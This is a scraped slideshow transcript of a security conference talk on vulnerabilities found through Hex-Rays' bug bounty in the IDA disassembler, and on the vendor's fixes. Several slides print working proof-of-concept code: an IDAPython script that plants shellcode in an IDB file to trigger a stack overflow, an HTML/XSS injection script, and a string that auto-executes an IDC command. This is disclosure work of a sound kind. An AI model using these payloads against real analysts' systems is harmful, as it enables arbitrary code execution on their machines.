Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
IDA’s Vulnerabilities and Bug
Bounty Program	
 
Masaaki Chida
Profile	
 
!  Security Engineer
!  Interested in Reverse Engineering
!  Participant in the sutegoma2 CTF team
What is IDA?	
 
!  Fully Featured Disassembler
!  Static analysis software used for analyzing malware etc.
!  Hex-rays’ Bu...
Bug Bounty Program Impressions	
 
!  Identified various types of vulnerabilities, more than
expected
!  Hex-rays responded...
Research Methodology	
 
!  Analysis in IDA
!  IDA Main Program (for windows)
!  Loader Modules
!  Processor Modules
!  Plu...
Investigating functions that handle IO
!  Data Read & Copy
!  read, lread, eread, qread, qlread, qfread,
!  memcpy, strcpy...
Script and command execution functions	
 
!  IDC Script
!  CompileEx, CompileLineEx
!  str2ea, calcexpr, calcexpr_long, ca...
Summary of Identified IDA Vulnerabilities	
 
!  Heap Overflow => Many
!  Stack Overflow => 2
!  DLL, Script Preloading => ...
Integer Overflow Vulnerabilities	
 
!  Problems
!  Almost all modules were a target
!  No integer overflow protections
!  ...
Integer Signedness Vulnerability	
 
!  Problem
!  Target was the AIF Loader Module
!  Stack buffer overflow occurs during ...
Classic Buffer Overflow Vulnerabilities	
 
!  Problems
!  Target was the .NET Processor Module
!  Binary to hex string con...
Classic Buffer Overflow Vulnerability	
 
!  #For Windows XP SP3 Japanese Edition
!  from idaapi import *;from struct impor...
HTML Injection Vulnerability	
 
!  Problem
!  Possible to inject arbitrary HTML when exporting analysis to
HTML
!  HTML en...
Preloading Vulnerability	
 
!  Problem
!  Automatically loads DLLs, IDC and IDAPython scripts from the
same directory cont...
Problems with Debugger Settings	
 
!  Problem
!  Debug target applications can be UNC paths
!  The flag to ignore debugger...
Automatic Debugger Execution Vulnerability	
 
!  Problem
!  Debugger is automatically run during memory dump analysis
!  A...
Automatic IDC Script Execution
Vulnerability	
 
!  Problem
!  Target was the .NET Processor Module
!  Using IDA’s hint dia...
Behavioral Differences in extract_name	
 
[X86, ARM Processor Module, etc…]
Python>extract_name("Exec(char(0x63)+char(0x61...
DEMO
Summary	
 
!  Lots of easy to find vulnerabilities still exist
!  I think bug bounty programs help in reducing vulnerabili...
Q&A
Upcoming SlideShare
Loading in …5
×

IDA Vulnerabilities and Bug Bounty  by Masaaki Chida

2,823 views

Published on

IDA Pro is an advanced disassembler software and often used in vulnerability research and malware analysis. IDA Pro is used to analyse software behavior in detail, if there was a vulnerability and the user is attacked not only can it have impact in a social sense but also impact legal proceedings. In this presentation I will discuss the vulnerabilities found and attacks leveraging the vulnerabilities and Hex-rays's remediation process and dialogue I had with them.

http://codeblue.jp/en-speaker.html#MasaakiChida

Published in: Technology
  • Be the first to comment

IDA Vulnerabilities and Bug Bounty  by Masaaki Chida

  1. 1. IDA’s Vulnerabilities and Bug Bounty Program Masaaki Chida
  2. 2. Profile !  Security Engineer !  Interested in Reverse Engineering !  Participant in the sutegoma2 CTF team
  3. 3. What is IDA? !  Fully Featured Disassembler !  Static analysis software used for analyzing malware etc. !  Hex-rays’ Bug Bounty Program !  3000 USD Reward !  Rewards for remote attacks against IDA and the Hex-rays Decompiler !  Started around February 2011 !  By January 2014, there were 11 bounties awarded https://www.hex-rays.com/bugbounty.shtml
  4. 4. Bug Bounty Program Impressions !  Identified various types of vulnerabilities, more than expected !  Hex-rays responded rapidly !  During normal business hours, email replies were immediate !  They also sent patches if the fixes were quick !  Parts that were difficult !  Creating the proof of concept exploit code !  Reproducing file formats !  Writing reports !  English !  Writing vulnerability details for people other than security engineers
  5. 5. Research Methodology !  Analysis in IDA !  IDA Main Program (for windows) !  Loader Modules !  Processor Modules !  Plugins !  Read the SDK plugins’ source code !  Observed the running processes’ actions !  Sysinternals Tools: Procmon
  6. 6. Investigating functions that handle IO !  Data Read & Copy !  read, lread, eread, qread, qlread, qfread, !  memcpy, strcpy, strncpy, qstrncpy, … !  IDB Database !  get_long, get_byte, ger_many_bytes, !  netnode_getblob, netnode_altval, netnode_supval, !  unpack_dd, unpack_ds, unpack_dw, … !  Heap Allocation !  malloc, calloc, realloc !  qalloc, qcalloc, qrelloc !  qvecto_reserve
  7. 7. Script and command execution functions !  IDC Script !  CompileEx, CompileLineEx !  str2ea, calcexpr, calcexpr_long, calc_idc_expr, !  Eval, ExecIDC, Execute File, Execute Line,… !  Command Execution !  call_system !  system, CrateProcess,…
  8. 8. Summary of Identified IDA Vulnerabilities !  Heap Overflow => Many !  Stack Overflow => 2 !  DLL, Script Preloading => Many !  Path Traversal => Several !  Automatic IDC script execution !  Automatic debugger execution !  ※These include bugs that were not eligible for bounty rewards
  9. 9. Integer Overflow Vulnerabilities !  Problems !  Almost all modules were a target !  No integer overflow protections !  Even functions like qcalloc were unprotected By exploiting buffer overflows it is possible to execute arbitrary code in many of the modules void *__cdecl qcalloc(size_t nitems, size_t itemsize) { void *result; // eax@2 void *v3; // ebx@3 if ( (signed int)(itemsize * nitems) > 0 ) { v3 = calloc(itemsize * nitems, 1u);
  10. 10. Integer Signedness Vulnerability !  Problem !  Target was the AIF Loader Module !  Stack buffer overflow occurs during analysis of the section name By exploiting the stack based buffer overflow it was possible to execute arbitrary code.
  11. 11. Classic Buffer Overflow Vulnerabilities !  Problems !  Target was the .NET Processor Module !  Binary to hex string conversion process !  netnode_getblob() did not validate the size of the input data By exploiting stack based buffer overflows it was possible to execute arbitrary code
  12. 12. Classic Buffer Overflow Vulnerability !  #For Windows XP SP3 Japanese Edition !  from idaapi import *;from struct import * !  a = 0x5874768A-0x24; b = 0x5874764A-0x14 !  shellcode="htIIGX5tIIGHWPPPSRPPafhExfXf5YrfPDfhS3DTY09fhpzfXf5rRfPDTY01f RDfhpQDTY09fh3NfXf50rfPfharfXf5dsfPDTY09hBzPKX5ceLJPDfhptDfh9tDTY01fh6Of Xf5jAfPDTY09hinEufhKWDfhkdfXf5WcfPfhnLfXf5g2fPDTY09fhgRDTY01fhQBfhdtfXf5 QXfPDfhlHDTY09fhaefXf57jfPDfh5PfXf5lVfPDTY09h7YqoX5RFUnPDfhjLDfhttDTY09f h8wfXf5PvfPDTY09h3YIXX54FiYPDfhatDfhgtDTY01fh7xDfh8pfXf5dofPfhitDTY09fhl zfXf53FfPfhYtDTY09fhGSfXf59KfPfhWtDTY01fhG0DfhRtTYf19fh3ZfXf55VfPDfhnvDf h5tDTY01fh6tfXf5FxfPDfhRvDfhJtDTY09fhr0fhCtDTY01hJRVdDfhlKfXf5MRfPDTY09f hUvDTY09fhmwDfhB4fXf5xhfPhdohchshinfhUifXf5C5fPDhehwshhystfhYjfXf5I6fPDh hm32hcalchexehfhTHfXf54ffPDfhRhfhKifXf5YDfPDTY09fhU1DRVWRTFfVNfhjsfXf5Er fPVUafhrWfYf1Lo9f1To9TXLLLrH“ !  payload=("1"*8)+(pack("II",a,b)*(9334/8-1))+("x55"*6) !  payload+=shellcode !  payload+=("1"*((len(shellcode)&4)+10-(len(shellcode)%4)))+ (pack("II",a,b)*(16000/8)) !  node_id=netnode("$ cli").altval(0x0C000014,'o') !  netnode(node_id).setblob(payload,0,'o') !  IDAPython script that inserts shellcode into an IDB file
  13. 13. HTML Injection Vulnerability !  Problem !  Possible to inject arbitrary HTML when exporting analysis to HTML !  HTML entities were not being escaped !  get_root_filename function !  Qbasename function exhibits odd behavior !  Calling qbasename(“x00:/path/filename”) returns “/path/filename” Possible to execute XSS when opening the generated HTML file from idaapi import * node=netnode("Root Node") node.set(“x00:</title><scritp>alert('XSS')</script>") save_database()
  14. 14. Preloading Vulnerability !  Problem !  Automatically loads DLLs, IDC and IDAPython scripts from the same directory containing the IDB file !  ida.idc, userload.idc !  windbg.exe, dbghelp.dll, dbgeng.dll, … !  idautils.py, idc.py, idaapi.py, … Possible to automatically read/execute unintended files, allowing for arbitrary code execution
  15. 15. Problems with Debugger Settings !  Problem !  Debug target applications can be UNC paths !  The flag to ignore debugger startup warnings is saved in the IDB file Possible to run a malicious remote file without any warning messages using the runtime debugger
  16. 16. Automatic Debugger Execution Vulnerability !  Problem !  Debugger is automatically run during memory dump analysis !  Automatic evaluation of debugger events !  Event Condition,Watch PointView Possible to execute malicious IDC script when loading an IDB file made from a memory dump
  17. 17. Automatic IDC Script Execution Vulnerability !  Problem !  Target was the .NET Processor Module !  Using IDA’s hint dialog !  1. get string of text below the line of the cursor !  2. Pass it to the extract_name function !  3. Pass it to the str2ea function !  Behavior of the extract_name function is different !  Control characters present in the NameChars item within ida.cfg !  IDC Script is implicitly run from the str2ea function parameters Possible to execute malicious script when parsing .NET files str2ea calcexpr_lon g calc_idc_expr CompileLine Ex Run
  18. 18. Behavioral Differences in extract_name [X86, ARM Processor Module, etc…] Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0) Exec --------------------------------------------------------------- .text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, … .text:00401000 db 'Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))',0 [.NET Processor Module] Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0) Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63)) --------------------------------------------------------------- .method private static hidebysig void Main(string[] args) {     ldstr "Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))“ } When positioning the cursor over ”db ‘Exec(char(0x63…” in x86, nothing occurs. Internally, str2ea(‘Exec’) is executed. However, in .NET moving the cursor over ”ldstr “Exec(char(0x63…” causes calc to be popped. Internally, str2ea(‘Exec(“calc”)’) is executed.
  19. 19. DEMO
  20. 20. Summary !  Lots of easy to find vulnerabilities still exist !  I think bug bounty programs help in reducing vulnerability !  I want there to be more bug bounty programs !  There are other bug bounty programs already running !  Those who are interested should join!
  21. 21. Q&A

×